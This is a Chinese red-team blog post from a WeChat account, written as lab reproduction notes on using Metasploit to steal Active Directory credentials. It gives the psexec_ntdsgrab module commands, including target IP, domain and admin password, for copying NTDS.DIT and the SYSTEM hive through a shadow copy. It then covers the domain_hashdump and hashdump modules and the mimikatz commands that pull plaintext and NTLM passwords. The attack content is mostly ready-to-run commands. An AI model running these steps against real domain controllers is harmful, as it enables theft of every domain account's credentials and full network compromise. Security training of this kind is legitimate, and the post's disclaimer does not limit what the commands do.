渗透攻击红队
一个专注于红队攻击的公众号
大家好,这里是 渗透攻击红队 的第 35 篇文章,本公众号会记录一些我学习红队攻击的复现笔记(由浅到深),不出意外每天一更
Metasploit
psexec_ntdsgrab 模块的使用
在 MSF 中使用 psexec_ntdsgrab 模块:
use auxiliary/admin/smb/psexec_ntdsgrab
set rhosts 192.168.2.25
set smbdomain god.org
set smbuser administrator
set smbpass Admin12345
设置完后然后执行 exploit 运行(要运行两次,该脚本使用卷影拷贝服务):
可以通过SMB服务直接与域控制器进行身份验证,创建系统驱动的卷影复制,并将NTDS.DIT和SYSTEM hive的副本下载到Metasploit目录中。这些文件可以与impacket等其他工具一起使用,这些工具可用于执行活动目录密码哈希值的提取。ntds.dit 和 SYSTEM会放在 /root/.msf4/loot/ 文件夹下:
之后就可以使用 impacket 工具包等解析 ntds.dit文件,导出域账号和域散列值了。
Metasploit 会话获取域账号和哈希值
首先是使用 msf 反弹了一个域控的 shell:
然后使用 MSF 的后渗透模块:
use post/windows/gather/credentials/domain_hashdump
set session 2
然后运行 exploit :
但是利用失败了,我也不知道为啥。
还可以使用 hashdump 来导出用户 hash:
还可以通过 MSF 加载 mimikatz 来读取密码:
# 加载mimikaz
load mimikatz
# 抓取明文密码
wdigest
# 抓取明文密码
kerberos
# 抓取加密后的ntlm、lm密码
msv
本文始发于微信公众号(渗透攻击红队):使用 Metasploit 获取哈希或域内哈希值
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论